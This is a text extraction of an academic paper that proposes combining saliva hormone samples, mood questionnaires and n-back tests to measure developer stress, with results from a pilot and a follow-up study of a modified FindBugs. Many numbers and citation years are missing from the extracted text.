understanding of stress reactions of developers, as it should be with any psychological construct. software engineering research, regretfully, is a long way from adopting rigorous and validated research artifacts. feldt et al. ( ) argued in favor of systematic studies of human aspects of software engineering, more specifically to adopt measurement instruments that come from psychology. seven years after the statement by feldt et al. ( ), graziotin, wang & abrahamsson ( a) explained that research on the emotional responses of software developers has been threatened by a lack of understanding of the underlying constructs, in particular the tendency to exchange affect-related psychological constructs such as emotions and moods with motivation, commitment and well-being. the article offers a clarification of these constructs and presents validated measures. meanwhile, lenberg, feldt & wallgren ( ) had published a systematic literature review of studies of human aspects that made use of behavioral science.
they called the field behavioral software engineering and found that, when conducting this kind of research, there are still several knowledge gaps and that there have been very few collaborations between software engineering and social science researchers. graziotin, wang & abrahamsson ( b) have also extended their prior observations to a broader view of software engineering research. given that much research in the field has misinterpreted, if not ignored, validated methodology and measurement instruments coming from psychology, the work offered brief guidelines to select a theoretical framework and validated measurement instruments from psychology. this includes a thorough evaluation of the psychometric properties of candidate instruments, which was later echoed in guidelines by gren ( ) and wagner et al. ( ). wagner et al. ( ) have highlighted a major case of such misconduct, which is evident from the systematic literature review of personality research in software engineering by cruz, da silva & capretz ( ). the review found that % of personality studies in software engineering use the myers-briggs type indicator (mbti), which was known more than years earlier to provide close to no validity and reliability properties (pittenger, ), meaning that the results of about half of the studies of personality in software engineering research are unlikely to reflect personality in their conclusions. the software engineering body of knowledge on stress is quite small and also lacking much understanding of the phenomenon (amin et al., ; brown et al., ), even though there are a few scattered studies that we can review. prolonged exposure to stressful working conditions can lead to burnout, as reported by sonnentag et al. ( ). in their sample of software professionals from companies, they found factors (e.g., lack of influence, lack of career prospects or stressors resulting from organizational policy) which can increase the risk of burnout, but also approaches (e.g., improvement of team communication, challenging, interesting tasks or better career opportunities) for potential stress reduction. they measured the burnout potential with a combination of three-hour-long structured interviews and questionnaires. fujigaki, asakura & haratani ( ) looked at the stress levels of japanese information system managers in software development. they reported stressors originating from the manager role as well as from the developer role. again, the authors relied on questionnaire data (background data, work-stressor items, questions on software project management details, and measurement of stress response) to reveal those stressors (e.g., job overload, technical difficulties or work environment). using questionnaires, hyman et al. ( ) examined the work-life balance situation of call-centre employees and software developers in the uk. their results show that unpaid overtime is on the rise due to staff shortage or personal commitment to finish the task at hand by the end of the day. in their in-depth analysis of post-war british industry they find that, as most employees do not draw their happiness from work, the work-life balance becomes more and more important, but harder to achieve, prompting additional stress in the lives of information and knowledge workers. a similar approach was adopted by rajeswari & anantharaman ( ).
they again used a questionnaire, with questions compiled from renowned papers in the field, to survey indian software professionals and identify potential stress factors. the factors (fear of obsolescence, individual team interactions, client interactions, work-family interference, role overload, work culture, technical constraints, family support towards career, workload, technical risk propensity) they present in their work cover all aspects from social problems to skill-related problems. this shows that these non-development-related stressors will come on top of the development-related problems we have identified in the introduction. amin et al. ( ) published a brief literature review of stress and what its role might be in the context of global software development. the authors talk about the importance of studying occupational stress among software engineers given their nature as intellectual workers, in particular on their activities of knowledge sharing, which they found to be most likely to be obstructed by stress-related effects. the authors conclude their review with a proposition to be further expanded by future work, that is, "in a (global software development) environment, with time zone differences, linguistic differences, technological issues, cultural issues and lack of trust, se occupational stress will be higher and will impede knowledge sharing." (p. ). to our knowledge, no follow-up study exists. müller & fritz ( ) used biomarkers to determine the difficulty of understanding a piece of code and, based on that, predict the consequences for the quality of the code. they utilized heart rate changes as a stress indicator to assess how difficult the currently examined code was for a participant to understand. they observed a statistically significant connection between biomarkers of stress and the resulting code quality. in a previous study, fritz et al. ( ) monitored the brain waves of the participants. the results show that it is possible to predict the perceived difficulty of a task based on psycho-physiological markers. as the difficulty of a task can be a stressor, brain waves are an interesting indicator to measure. however, this kind of study needs specialized equipment, making it hard to be used on groups, and the analysis of the results is very complex. behroozi et al. ( ) examined the influence of stress on the ability to think, memorize and concentrate, using technical interviews with a whiteboard as a tool to communicate complex ideas as the stressing event. they used eye tracking to measure the fixations on areas of the whiteboard. the number of fixations on different areas increased under pressure, indicating a lowered ability to concentrate, as the participants had to go back to previous sections more often. suni lopez, condori-fernández & catala bolos ( ) conducted a study towards the implementation of a real-time stress-detector system based on wearable devices but following an arousal-based statistical approach, as opposed to previous studies applying machine learning for understanding emotional states and stress. the validation study adopted an ad-hoc -point ordinal scale for stress detection (from "not stressed" to "extremely (stressed)") and could obtain an accuracy of % using the arousal-based model.
they found that the collaborative practices in agile might be a great source of stress. therefore, they conducted a nationwide swiss questionnaire on agile adoption in it, where they asked (among other things) how agile software development influenced participants' stress at work. stress was assessed using an ad-hoc single item, ranging from (significantly less stressed) to (significantly more stressed). the research analyzes correlations between the stress item and agile practices, finding that, for example, high stress levels have a negative effect on team morale. from our examples of related work and the growing rate at which stress research in this area is conducted, we conclude that stress is a topic of interest in the computer science community. while all previous studies contributed to our understanding, there are indications that software engineering has been avoiding robust and validated methodology for stress detection and psychological issues in general, thus threatening the validity and reliability of studies (graziotin, wang & abrahamsson, b). most of these studies use non-standard, ad-hoc, and non-psychometrically validated questionnaires to assess the stress reaction, either by self-report or by a number of questions aimed at deriving the personal stress level. the use of such questionnaires calls for a rather large group of participants to increase the probability of being able to report significant results. also, the analysis of the questionnaires leaves space for interpretation, as they tend to differ from study to study and thus make it difficult to compare different studies by different researchers. with our article and the following proposed method, we aim to critically extend the comparability of study results and hopefully overcome some of the previous limitations. background in the following, we will provide a definition of stress and different ways to measure it. we think it is important to have this background knowledge prior to designing sound studies. also, the information provided can help researchers who are not trained in medicine and psychology to better understand their stress target in the design phase and to assess if our proposed method is adequate for their topic of research. definition of stress stress has been viewed from medical, psychological and organizational angles, resulting in many definitions. the most general definition of stress is the general adaptation syndrome (gas) defined by selye ( ). the gas definition can fit every scenario from a personal short-term stress event to global long-term scenarios. weinert ( ) provided a formulation of it with an organizational and workforce psychology view. in the following we focus more closely on weinert's explanation of gas, as it does not dive as deep as selye into medical details and, hence, is easier to understand for an audience without medical background. stress is "… an adaptive reaction to exceeding mental or physical demands of the surroundings. adaptive, because the resilience towards those demands is individually different." (weinert, ). weinert ( ) derives that definition from these factors of stress: (1) stress needs a physical or psychosocial trigger event; (2) individuals react differently to that trigger event; (3) constraints and demands are linked to the build-up of stress. constraints and demands are, for example, deadlines or quality requirements connected to the trigger.
however, this does not mean that every event that fits the above definition necessarily affects a person. in this context, commonly mentioned conditions for people to be affected by stress are (weinert, ):
- the outcome or consequences of the trigger event must not be known beforehand. if the result of the stressful event is perceived as "unchangeable" it will generate no or much less stress compared to the same event with an uncertain outcome.
- the outcome or consequences of the stressor have to have an influence, either good or bad. this becomes most obvious in high-stake scenarios, for example at war, where, for example, erwin rommel said: "don't fight a battle if you don't gain anything by winning." (rommel & pimlott, ).
for better understanding, let us make an example related to software development: a software product is due to be released to an important customer. the future of the company depends on this commercial operation because funds are running out. it is not known yet whether or not the customer will buy the product in the current state. the trigger event in our example is the prompt release of the product (deadline). the consequences of the stressor are not known, as it is not clear if the product will be sold, at what price, and if this sale will keep the company financially afloat. the outcome is important to the developer because his/her job might depend on it. each person in the company might experience a different level of stress connected to this scenario based, for example, on their individual judgement of the ease of finding a new job if the project is not successful and the company goes bankrupt. if a person has already mentally resigned and is sure to find a new job, or already has a new job, he/she might not experience any stress at all. the gas can be used to model every stress interaction in general. as in the example above, it can be used to view the impact of stress (the critical release of the software product) on the company as a whole. a more narrow focus is the theory of lazarus ( ), which refines the idea of selye. by narrowing the reaction to a stressor to the cognitive processes active when dealing with stress (transactional or cognitive stress theory), this model is closer to the situation of knowledge workers such as software developers than the generalized model of selye. in the transactional model, if a situation is assessed to be a strain, the situation can be considered as already harming, potentially harming (threatening) or as a risky, but worthwhile, challenge. the assessment and the progress of the situation, based on the personal resources and the possible solutions for coping with the stressor, can change over time. based on these possibilities an actual reaction is provoked. this reaction to the stressor is, in the best case, a direct action to solve the stressful situation (fight) or, in less favorable constellations, evasion (flight) of the situation or other coping strategies (e.g., trivialization). this cycle of assessment based on the changing surroundings and continuous evaluation of coping strategies will be repeated until an appropriate coping strategy is found, which ends the stressing encounter.
if no fitting coping strategy can be found, the person is either blocked by the continuing search cycle, or, through the application of unfitting solutions with a high usage of resources, the problem is gradually eroded until it can be completely overcome. let us again imagine a software engineering example for this stress model: a new member of a development team has been assigned to the first task in the project. it is a non-trivial part of the system to be implemented and it is the developer's chance to prove his/her worth to the team. after the situation was found to be stressful, a second assessment of the problem reveals that the new member feels a lack of skills needed to finish the given task properly (situation assessed to be threatening). despite that feeling he/she still starts working on the problem (coping). the new team member is working on the problem and his/her knowledge and skills increase as he/she goes, and the assessment of the situation may change to "risky but worthwhile". the assessment can change again in the course of action, for example if the new member encounters a problem which can not be fixed easily. the assessment can then again rise to threatening or even harmful, depending on the personal resources available. still, the assessment will continue until the situation is solved one way or another. it is important to keep these definitions of stress in mind when designing a study or experiment which aims to measure stress, because we need to be aware of the stress generation, which is still not fully understood (noack et al., ). most of the time we will already have a stressor we want to take a look at (e.g., project deadlines), but to keep that stressor as free from other influences as possible, and for a correct interpretation of the results later on, we need to look at potential constraints and demands which might not affect all participants in the same way. we also have to find a way to make the participant care about the outcome of the stressor if it is an artificially created stressor. there are some commonly used ways to induce stress in experiments, like the trier social stress test (kirschbaum, ), which uses social evaluation and cognitive demands to generate stress. another way can be to create a competitive scenario in which participants can earn a reward based on their results on a task compared to the other participants. effects of stress to understand the ways to measure stress, we need to know the basic reactions of the body and mind to stress. a frequently cited summary of the general effects of stress has been written by kaufmann, pornschlegel & udris ( ). somatic short-term effects include increased heart rate, raised blood pressure and adrenalin discharge. the personal psychological effects might include a feeling of strain, frustration, anger, fatigue, monotony and saturation. the individual behavior can suffer from performance fluctuation, decline of concentration ability and bad sensorimotor coordination, leading to an increased error rate. medium- and long-term stress exposure can lead to psychological problems such as dissatisfaction, resignation and depression and general psychosomatic ailment and disease. the negative effect of medium- to long-term exposure to stress on behavior can include increased consumption of nicotine, alcohol or drugs as well as absenteeism (sick days) on the individual level, and conflicts, quarrels, general aggression against others and withdrawal (isolation) at and outside of work on a social level. even short-term stress can lead to unpleasant side effects, which are especially harmful for communication and cooperation-dependent work like software development. since kaufmann, pornschlegel & udris ( ) summarized the effects, more research has been conducted supporting and extending the understanding of the stress effects mentioned by them. we will go into more detail below. physical reactions the physical reactions of the human body can be explained by the survival needs of our ancestors. it is often called the "fight or flight" reflex, first introduced by cannon ( ). in stressful situations in prehistoric times, for example the encounter with a predator, the body needs energy to fight or to run away (flight), so it releases adrenaline to the blood stream, ordering the endocrine system to start providing chemical energy. noto et al. ( ) described the effects of stress on the endocrine system focusing on cortisol and alphaamylase. in short, under stress the cortisol and alphaamylase concentration increases, providing additional energy to the organism (e.g., increasing the blood sugar). both these effects help the body to release chemical energy (e.g., sugar) to the blood stream. these effects are traceable in saliva. the heart rate increases (vrijkotte, van doornen & de geus, ) in stressful situations to transport the mentioned substances faster through the body as well as to provide more oxygen, which is needed to utilize the chemical energy carriers freed by the cortisol and the alphaamylase. due to the increased body activity, sweat can break out, changing the electrical conductivity of the skin as a result. sweat might also be a result of physical work, which is considered a form of stress for the body. stressful exhaustion might lead to involuntary muscle contraction (tremors). but not only physical stress can lead to involuntary muscle contraction. getting tired as a result of work/stress leads to increased blinking. these are short-term reactions. if these short-term effects are prolonged, they can have negative effects on the human body. commonly mentioned effects of long-term stress on the human body are: high blood pressure, high cholesterol values and heart diseases (weinert, ; kaufmann, pornschlegel & udris, ; richter & hacker, ). the physical reactions of the human body to stressful events can change based on the demands and resources (e.g., a more muscular person might endure physically demanding work longer than the average person). most of the reactions to stress are internal, steered by the hormone system. the increase of these chemical messengers can be utilized as a measurement, as they remain in the blood and also in saliva and urine for some time. psychological reactions if the stressing situation prevails, it has negative short- and long-term effects not only on the body but also on mental health.
mental health problems related to stress are on the rise in the modern world, as shown by lademann, mertesacker & gebhardt ( ) in their analysis of the sick notes submitted to health insurances, or in the stress report for germany (lohmann-haislah, ), which gives a yearly overview of the stress situation of the german workforce. cohen ( ) wrote a summary of the research on stress effects so far. among other topics, he wrote about after-effects of stress on the social behavior of stress-plagued persons. he reported about various experiments where the participants previously exposed to stress showed significantly less helpfulness and empathy as well as higher levels of aggression towards other people. (where not explicitly cited, the references in this section are taken from the textbook "biologische psychologie" by birbaumer & schmidt ( ).) amongst others, weinert ( ) listed as psychological effects of stress (similar to the definitions seen in "effects of stress"): poor concentration, difficulty
the short-term assessment strategies try to assess the stress experienced for some minutes up to an entire day by at least two questionnaires or interviews, ideally before and after the stressful event. the items used in these tests range from a plain assessment by the participant on the momentary stress level on a scale from to to more episodic tales of events including the points of why this event was found to be stressing, how severe and long the stress was felt. this kind of data collection is used regularly in psychology as well as medical research and is commonly considered as reliable given good psychometric properties. ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ an example from the software engineering point of view to distinguish between long and short-term term stress assessment could be the difference between keeping track of a whole development project, taking a sample each day and assessing the stress of a single -h programing session. the other class, aiming at looking at stress coping strategies, uses questionnaires that ask general questions like “how do you handle stressful situations?” or “what kind of situations do stress you?”. this can also be done over a period of time, to gather a stress profile, by repeating these question over the day. stress also affects concentration and memory (weinert, ) because of the cognitive resources needed to cope with the increased stress. this use of cognitive resources is called cognitive load. cognitive load can be measured by testing concentration and memory of participants using tests like the n-back-test (gevins & cutillo, ). stress can also have a negative effect on a person’s mood, leading to frustration and anger at short-term and, at worst case, to a depression at long-term exposure, as mentioned in “effects of stress”. mood can be assessed by questionnaires like panas (positive and negative affect scale, watson, clark & tellegen ( )) or esr (emotional self rating scale, schneider et al. ( )). all these questionnaire based approaches can suffer from common issues and biases when working with humans participants (king & bruner, ; paulhus, ; schwarz, ): � honesty/image management: the problem how the participant wants to present him/herself and what he/she is willing to reveal about him/herself. � social desirability: the distortion of answers by the participants because they feel like some answers are more socially acceptable than others. � introspective ability: concerns to which degree the participant is able to understand him/herself. � understanding: as human language is not perfect and needs to be interpreted, formulations can be understood differently. � rating scales: the nuances of ratings can be interpreted differently. � response bias: the individual’s tendency to respond in a certain way, regardless of the actual evidence they are assessing. psychological tests have ways to balance such issues by providing control answers which show contradictions. despite that, it is always desirable to back up these results with biological factors which are much harder to be influenced by involuntary effects and biases. biological markers the biological factors available to us and mentioned in literature to measure stress are heart frequency, blood pressure, electrical conductivity of the skin, activity of muscles and hormone levels (birbaumer & schmidt, ). 
the assessment of these factors is not easy, as the difference between a normal phase of strain and abnormal stress needs to be considered and not every factor is applicable to each form of perceived stress (physiological, emotional, mental). ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ skin conductance the skin conductance is measured whenever the differential or changing impact of stress needs to be assessed (andreassi, ). electrodes have to be attached to the participants non-dominant hand. this approach has two main disadvantages: first, it might introduce additional stress as the electrodes are a constant reminder for the participant that they are being monitored and, in a typical case of software engineering research, it is not applicable to larger groups in parallel because of the need of multiple devices for measurement and medical trained personal for the correct application of the electrodes. sensors for measuring the sweating can be used if only a difference between calm and stressed states is of interest and no finer assessment is required. heart rate the measurement of heart rate and blood pressure can be a sensitive tool to measure mental stress (hjortskov et al., ) but it suffers from the same disadvantages as the measurement of skin conductance: the invasion of personal space and the in-feasibility to extend it to large groups, for the same reasons as mentioned for conductivity of skin. muscle activity we base our discussion of muscle activity on the works by boucsein ( , ). muscle activity can be measured, among other ways, via eye blink frequency, eye movement or mydriasis (size of the pupil) using an electromyogramm or observing muscle tremors. the difficulty to obtain the measurements and the expressiveness of these measures varies widely. while blinking frequency, eye movement and size of the pupil are relatively easy to measure for individuals, the results are heavily dependent on the task given and are only significant in combination with other measurements. tremors can be observed optically, but are mostly a sign of physical stress which is not a form of stress normally induced by computer work and so it is out of the scope of this work. the electromyogramm is a good method to measure muscle activity using electrodes similar to the one used to measure skin conductance. this again is more meaningful for the research on physical stress which the average software developer is not likely to experience in an extended amount in day to day work. besides the low relevance for software engineering, the methods to measure muscle activity suffer from the same disadvantages as mentioned for skin conductance. hormone level the usefulness of hormones for stress assessment has been shown by goldstein ( ) and noto et al. ( ). the hormone levels of cortisol and the protein alpha amylase (nater et al., ) which indicates the utilization of blood sugar are found in saliva samples (chiappelli, iribarren & prolo, ; kirschbaum & hellhammer, ; chatterton et al., ; reinhardt et al., ). saliva can be gathered and stored for a couple of days in plain plastic tubes, without any specialized equipment or sophisticated cooling mechanism. if the samples are to be stored for a longer time, they have to be frozen to avoid degradation. samples can be sent to a laboratory for analysis via postal service. the laboratory will use an analysis kit and return the analysis results. the results can be ostberg et al. 
( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ interpreted using basic statistical tests. support by medical trained scientists improves the quality of the conclusions drawn from the results as they might be able to explain possible outliers originating from health problems of the participants or medical drugs used by participants. hence, we opt for the latter biological family of stress assessment which we pair with validated psychological assessment. we propose a methodology in the following. proposed method for stress measurement the method we propose, inspired by kirschbaum & hellhammer ( ), van eck et al. ( ), and strahler et al. ( ), is applicable to controlled experiments in software engineering which aim to examine the effects of stress. it consists of measurements of psychological markers, measurements of biological markers, and a description of sequences and details of the measurements. the measurement tools for the psychological and biological markers have been selected in cooperation with psychologists, have been used in a massive amount of studies (e.g., hellhammer, wüst & kudielka ( ), khalfa et al. ( ), thompson et al. ( ) on hormone usage, e.g., pressman & cohen ( ), e.g., jennett et al. ( ) on panas and weiss, salloum & schneider ( ), schneider et al. ( ) on esr), and are commonly agreed to be reliable and valid. measurement tools we propose to assess stress, emotional state and cognitive load of participants, where the first factor is observed both from a psychological and a biological perspective. figure describes in greater detail the constructs under study and the related measurement instruments. we assessed stress using biological markers through saliva samples. in particular, we measured cortisol and alphaamylase, as the saliva samples are easy to gather and the hormone/enzyme levels in it are easy to measure by any laboratory specialized in hormone analyses. we propose panas (positive and negative affect scale, watson, clark & tellegen ( )) and esr (emotional self rating scale, schneider et al. ( )) for the psychological stress and emotional stress markers as self-ratings have a good time-to- information ratio. panas and esr are used to assess the participants emotional state and current mood, as increase in stress has a negative effect on mood (see “effects of stress”). we extended panas with questions asking about pre-existing stress levels and possible previous knowledge and skills related to the task to be done in the experiment, because previous knowledge can have an impact on coping strategies of the individual and have an impact on stress generation. with these extensions our panas scores for the positive factors ranges from to and the negative factors from to . cognitive load (see also “psychological measurements” on psychological measurements) is conveniently operationalized and measured by the n-back test as implemented by the computerized pebl psychological test battery (mueller & piper, ). pebl allows the data to be gathered automatically and exported as datasets. n-back challenges participants to memorize letters and their position in a sequence of letters which are shown one letter at a time. with a n-back test, participants have to press a key if a ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ letter has been repeated n steps back. 
for example, for the letter sequence {x, x, x, v, x, y, y} and a -back test, the key should be pressed at ( for key press, for no key press) { , , , , , , }. the correct key presses for a -back test would be { , , , , , , }. the hit/miss ratio and reaction time indicates how much cognitive capacity is left to work with. in order to reduce the learning effect when the test is used multiple times, there are variations of this test (e.g., not letters, but positions in a × square are to be correctly remembered). besides demographic data, a study should also collect control-variables that might influence the stress reaction, such as pre-existing mental conditions and medications (e.g., birth control pill). also, as this might have an increasing effect on personal stress, we asked how satisfied the participants were with their decision of life and work situation alongside the demographic questions. the data was gathered anonymously and linked together only through an anonymous identifier. figure our proposal for a robust and sound experimental design to assess causes and consequences of stress in software engineering. the grayed-out activities were omitted in the final design iteration. full-size doi: . /peerj-cs. /fig- ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ measurement sequence the first step in implementing our proposed method is to decide on the frequency and placement of the cortisol and alphaamylase measurements. the decision should take into consideration that, while more measurement points in a shorter period of time will provide a more detailed picture of the stress reaction to the topic under observation, it also will affect the stress generation itself. the shortest cycle is also limited by a few parameters. participants only have a limited ability to generate enough saliva. too frequent disruptions might be perceived as a nuisance, increase the generated stress, and might have an additional negative effect on the topic under research or even cover the stress reaction under observation. also, the hormone system reacts in the range of minutes to hours whereas the nervous transmission reacts in milliseconds (cortisol peeks around – min after stress onset (kirschbaum & hellhammer, )). if the stress-inducing task is too short (less than min) a second sample should be gathered to increase the chance to include the peak or other measurements (e.g., heart rate or skin conductivity) can be used, but with the impediments stated above. as cortisol has a daily cycle, the gathering of the saliva samples also needs to be planned in a way that all participants are assessed at the same time to generate comparable results. in order to add noise to the cortisol and alphaamylase measurements, it is important to instruct the participants to not consume beverages containing sugar and not to eat or smoke one hour before the saliva samples are gathered. the times when the personal stress and emotional state are assessed have to be adjusted as well. as it takes a non-trivial amount of time to fill in the questionnaires, the personal and emotional assessment should happen at the beginning of the study to determine a measurement baseline, then at appropriate times in the course of the study and at the end of it. in the case of short periods of saliva sample measurements it is sufficient to have the personal stress levels and emotional state measured at the start and end of a task. 
if the topic under research contains longer breaks we advise to use the questionnaire measurement at the start and end of the breaks. for long term studies, we advise to use the self-assessment via questionnaires at least twice a day, possibly at the beginning and end of the work day. by doing so, the influence of stress generated outside the object under research can be identified and taken into account when looking at the stress reaction. in our case, the measurement of the cognitive load happens after a substantial part of the task under research and before the questionnaires assessing the personal stress level and mood, so the cognitive load is only influenced by the task. as with the questionnaires, for long-term studies, the n-back should be used at the start and end of the working period. we illustrate the entire design process in fig. . it represents the process as it was derived from our literature review and consultations with colleagues from the psychological and medical fields. participants face a short cool-down period (approx. min) of no activities, for controlling purposes, during which most of their markers stabilize. we then instruct participants about the experiments goals. after that, the participants sign a consent form (not present in fig. ). we collect a first sample of ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ saliva, which sets the baseline stress value of participants. after the baseline stress measurement, participants fill in demographic questionnaires. following the demographic questionnaires, we start assessing the baseline mood and perceived stress with esr and panas. participants then face the first computerized task, that is the n-back test, for assessing the baseline cognitive load. as the n-back test might be stressful to participants, we take a second saliva sample to be able to monitor the stress build-up for the task under observation later. the “stress” task for the experimental and control groups can then begin. the length and amount of the experimental task parts (fig. shows two parts) should be dictated by the decision on the saliva sample interval. in our case, we take a third saliva sample at around half of the time planned for task solving. the stress markers cortisol and alphaamylase should be peaking here as the endocrine system has had enough time to respond to the initial stress trigger of the task (cortisol peeks around – min after stress onset (kirschbaum & hellhammer, )). we take a fourth and final saliva sample at the end of the experimental task. finally, participants do the computerized cognitive load test once more, to measure the available cognitive resources left after the experimental task. a final set of ratings of mood and perceived stress follows. the last two activities are inverted compared to those before the task, as the cognitive load score should not be influenced by the questions for rating mood and self-assessment. longer studies performed over several days have a similar design to fig. , varying only in the intervals of measurements as mentioned above. if the assessment of the recovery from the stressor is of interest, a measurement of all relevant indicators (cognitive load, mood, perceived stress, hormone/enzyme levels,…) should be done – min after the stressor onset. in the remainder of this paper, we report on two studies that allowed us to implement and refine the overall research design. 
two studies implementing the proposed method in the following, we present two studies, the first being a pilot, implementing our proposed method for stress assessment. the lessons learned from the application of this method helped us with its refinement. the purpose of our studies was to analyze stress reduction effects, cognitive load reduction, mood improvement, and software quality enhancement of visual and user experience changes to the static analysis tool findbugs. the control group used the latest version of findbugs. the experiment group used a version of findbugs which was modified following the salutogenesis principles. salutogenesis is a well-being theory based on comprehensibility, meaningfulness and manageability, used to explain perceived stress or to help cope with it by changing these variables. we have previously proposed this for enhancing the interaction of software developers with their tooling (see ostberg & wagner ( ) and ostberg et al. ( ) for details on salutogenesis). by design, all tasks required a considerable effort and it was not possible to finish them in the time given. the varying difficulty of the subtasks does not require the participants to meet a certain level of skill, but some basic understanding of programming, yet still provides enough of a challenge for the advanced participant. pilot study the pilot study implemented the method of fig. in its entirety. we only added a set of questions aiming at self-efficacy (bandura, ; jerusalem & schwarzer, ; kogler et al., ) to the psychological test phases, which allowed us to assess the individual stress resilience of the participants. for the pilot we recruited volunteers from the msc course "software quality assurance and maintenance" at the university of stuttgart. students were in their nd or rd semester of studies. none of them reported any medical conditions interfering with the stress measurement. we were aiming for a high number of participants even in the pilot, as we wanted to evaluate how easily large groups can be assessed with our chosen methods. to induce stress, the participants were told that a list with the results of their work on the code (number of correct fixes) would be made public, so every participant could see how well he or she did compared to the other participants. we never delivered on our threat, for obvious ethical reasons, but the stress was induced by our statements. we split the work phase into two parts of min and min; the first part was a bit longer in order to compensate for the time needed to get into the task. to avoid learning effects, the second n-back test used positions in squares rather than letters. results unfortunately, we faced some data loss due to failing hard drives. the boxplots in figs. – show the data we were able to retain. figure shows the distribution of the panas values. from bottom to top we have the sum of the positive factors before the task, the positive factors after the task, the negative factors before the task and the negative factors after the task. the top four plots show the difference between pre and post panas scores. this shows the progression of the emotional state of the participants. figure shows the number of correct responses to the n-back stimulus in percent and fig. shows the reaction time in milliseconds to the n-back stimulus, both pre and post the task.
the values for correctness and reaction time are connected, so the participants for both values are the same. of the panas and esr questionnaires, out of from the experiment group and out of from the control group were usable. the emotional state based on the panas values is calculated by summing up the positive effects and subtracting the sum of the negative effects. to see the emotional change, we calculated these values pre and post-work phase. the difference of these values indicates the emotional change. performing a repeated measures (rm) anova with time (pre, post) and valence (pos, neg) as within-subject factors and group as between-subjects factor revealed no significant effect of time (f( , ) = . , p = . ), a significant valence effect (f( , ) = . , p = . , part-eta-sq. = . ) with higher values in the positive valence than negative valence, ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure panas pos(itive) and neg(ative) mood indicators exp(erimental) group (sample size = ) and con(trol) group (sample size = ). full-size doi: . /peerj-cs. /fig- figure n-back correctness for the exp(eriment) group (sample size = ) and con(trol) group (sample size = ). full-size doi: . /peerj-cs. /fig- ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and no significant group effect (f( , ) = . , p = . ). moreover, no interaction reached significance (all p > . ). the data of the esr (see also tables and ) does also not show statistically significant group differences for the emotion (all p > . ) and stress (p = . ) ratings. table reports all values we gathered for cortisol and alphaamylase. see fig. for the location of the various measurements in the study progress. the sample size refers to the actual sample size used for calculations at this step, as the lab analysis reported invalid values for some steps/participants, probably due to not enough saliva samples left as they had to rerun some of the analysis. from the numbers we can see a build up of a figure n-back reaction time for the exp(eriment) group (sample size = ) and con(trol) group (sample size = ). full-size doi: . /peerj-cs. /fig- table pre and post-experiment task values for esr factors, experiment group, pilot, sample size = . anger disgust happiness sadness surprise fear stress esr pre experiment group mean . . . . . . . standard deviation . . . . . . . median . . . . . . . esr post experiment group mean . . . . . . . standard deviation . . . . . . . median . ostberg et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hormone stress response with a slightly later peak in alpahamylase for the experiment group. the statistical tests (willcoxon u for α = . for cortisol (c = . , c = . , c = . , c = . ), cliff’s delta for cortisol (c = − . , c = − . , c = − . , c = − . ), t-test for α = . for alphaamylase (a = . , a = . , a = . , a = . ) cliff’s delta for alpha amylase (a = − . , a = − . , a = − . , a = − . )), reveal no significant differences between experiment and control-group. a rmanova table pre and post-experiment task values for esr factors, control group, pilot, sample size = . anger disgust happiness sadness surprise fear stress esr pre control group mean . . . . . . standard deviation . 
table: cortisol and alpha-amylase scores (baseline, offset, peak, and final cortisol in pg/ml and alpha-amylase in u/l; mean, deviation, median, and sample size per group), pilot.

a repeated measures anova on the cortisol levels revealed no significant time effect (f( , ) = . , p = . ), no significant group effect (f( , ) = . , p = . ) and no significant group*time interaction (f( , ) = . , p = . ). similar to the results on cortisol, the rm anova with the alpha-amylase levels indicated no significant time effect (f( , ) = . , p = . ), no significant group effect (f( , ) = . , p = . ) and no significant time*group interaction (f( , ) = . , p = . ). the raw data of the hormone levels can be found in the appendix in tables a and a . the increasing effect size might imply that the differences between the control and experiment groups would become more visible if the experiment had run longer and if we had had more usable data points. it is also possible that a stronger stress induction would lead to a more visible effect.

due to various problems at the time of the experiment's execution, we were only able to gather usable data sets (correctness/reaction time for pre and post task) for the control group and data sets for the experiment group for the n-back test. for these data sets, the other data (panas, esr and hormone/protein levels) is also available. in the pilot we see an improvement of correctness and reaction time for the experiment group (see the medians in the boxplot figures), while the correctness for the control group decreases. still, analyzing the effect of the intervention on cognitive performance, the rm anova with the within-subject factor time (pre, post) and the between-subjects factor group revealed no significant time effect (f( , ) = . , p = . ), no significant group effect (f( , ) = . , p = . ), and no significant time*group interaction (f( , ) = . , p = . ).

conclusion

despite the data being inconclusive, the pilot experiment showed the feasibility of the design. the saliva samples were easy to collect for both the participants and the researchers, and the indications given by the physical measurements match the indications of the psychological measurements. we used the lessons learned to make some changes to the study design, which we discuss next.

study 2

in the design of the second study the grayed-out parts of the design figure are removed. this represents our changes based on the lessons learned from the pilot. we removed the initial cool-down factor and the first saliva sample. for the sake of consistency with the figure, we still call our new first saliva sample the offset stress, but we consider that measurement step our new baseline stress. the pilot did not suggest differences in the measured levels within baseline stress or between baseline and offset stress, so we assume that the psychological test and n-back session do not induce any significant stress in software developers.
as a positive side effect, this elimination of one of the saliva samples reduces the time and money needed for the laboratory analysis. we also reduced the number of questionnaires in the psychological test phases by removing the resilience questions. the values of these question items did not help in explaining any of the effects analyzed, and during our observation and in post-experiment statements, participants seemed to be most irritated by the resilience questions.

